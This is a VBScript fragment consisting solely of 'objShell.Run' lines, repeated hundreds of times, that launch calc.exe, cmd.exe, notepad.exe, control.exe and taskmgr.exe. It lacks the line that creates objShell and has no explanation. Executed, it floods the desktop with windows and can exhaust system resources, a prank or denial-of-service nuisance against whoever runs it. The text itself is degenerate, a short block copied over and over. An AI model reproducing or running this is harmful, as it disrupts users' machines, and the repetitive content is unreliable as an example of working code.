objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
